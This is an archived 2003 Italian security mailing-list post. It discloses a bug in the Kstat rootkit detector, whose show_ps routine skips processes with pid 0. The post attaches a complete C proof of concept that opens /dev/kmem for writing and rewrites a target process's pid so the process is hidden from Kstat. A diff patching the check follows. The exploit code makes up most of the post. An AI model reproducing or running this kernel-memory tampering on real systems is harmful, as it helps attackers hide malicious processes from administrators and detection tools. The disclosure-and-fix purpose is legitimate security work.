[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Febbraio 2003 ml@sikurezza.org Soggetto: Kstat Bug Mittente: Dark Angel Data: 18 Feb 2003 23:58:24 -0000
Kstat ha un problema nel riconoscimento dei processi nella show_ps nel file ps.c alla riga 278: Quando controlla le strutture in memoria se il pid del processo preso in esame h uguale a 0 non viene ritenuto un possibile processo maligno. Allego fix + proof of concept code. Saluti a tutta la ml. -== Dark-Angel ==- ____________________________________________________________ Get 25MB of email storage with Lycos Mail Plus! Sign up today -- http://www.mail.lycos.com/brandPage.shtml?pageId=plus
/*
* PROOF OF CONCEPT CODE FOR KSTAT by Dark-Angel <dark0@angelfire.com>
*
* Change the pid to 0 to hide the process. Change it back BEFORE tha program ends, or you'll have a crash
* Remember to fill #PIDHASH with cat /proc/ksyms | grep " pidhash" | cut -f1 -d" "
* Have fun! ^_^
*
* Greets to all #phrack.it ppl!
*/
#define __KERNEL__
#include <linux/sched.h>
#include <linux/types.h>
#undef __KERNEL__
#include <stdio.h>
#define KMEM "/dev/kmem"
#define PIDHASH 0xfillme
void usage(char *);
int
main(int argc, char *argv[])
{
int fd,
counter,
pid;
struct task_struct task,
**az,
*tmp,
*array[PIDHASH_SZ];
if (argc < 3)
usage(argv[0]);
if ((fd = open(KMEM, O_RDWR)) < 0) {
fprintf(stderr, "Cannot open kmem!\n");
exit(-1);
}
if (lseek(fd, (off_t) PIDHASH, SEEK_SET) == -1) {
fprintf(stderr, "Cannot locate pidhash!\n");
exit(-1);
}
pid = (int) getpid();
if (read(fd, &array, sizeof(array)) < 0) {
fprintf(stderr, "Cannot read!\n");
exit(-1);
}
for (counter = 0; counter < pid; counter++) {
az = &array[pid_hashfn(counter)];
tmp = *az;
if ((struct task_struct *) tmp) {
if (lseek(fd, (unsigned long) tmp, SEEK_SET) == -1) {
fprintf(stderr, "Cannot locate tasks!\n");
exit(-1);
}
if (read(fd, &task, sizeof(struct task_struct)) < 0) {
fprintf(stderr, "Cannot read!\n");
exit(-1);
}
if ((task.pid == atoi(argv[1]))
&& strcmp(task.comm, "swapper")) {
task.pid = atoi(argv[2]);
if (lseek(fd, (unsigned long) tmp, SEEK_SET) == -1) {
fprintf(stderr, "Cannot relocate!\n");
exit(-1);
}
if (write(fd, &task, sizeof(struct task_struct)) < 0) {
fprintf(stderr, "Cannot write!\n");
exit(-1);
}
printf("Pid Modified!\n");
return 0;
}
}
}
fprintf(stderr, "Cannot find PID!\n");
return -1;
}
void
usage(char *arg)
{
fprintf(stderr,
"Usage:%s PID (to hide) CHANGE (change PID into this\n", arg);
exit(-1);
}
73c73
< struct task_struct task, taskk, ptaskk, *wow, **ht, htask,*check;
---
> struct task_struct task, taskk, ptaskk, *wow, **ht, htask;
93c93
< check=(struct task_struct *)kstat_addr=find_kmem_offset(TASK_OFF);
---
> kstat_addr=find_kmem_offset(TASK_OFF);
95c95
<
---
>
279c279
< if(wow!=check)printf("\nPossible stealth process with pid:%d\tname:%s at %p",
---
> if(htask.pid)printf("\nPossible stealth process with pid:%d\tname:%s at %p",
________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005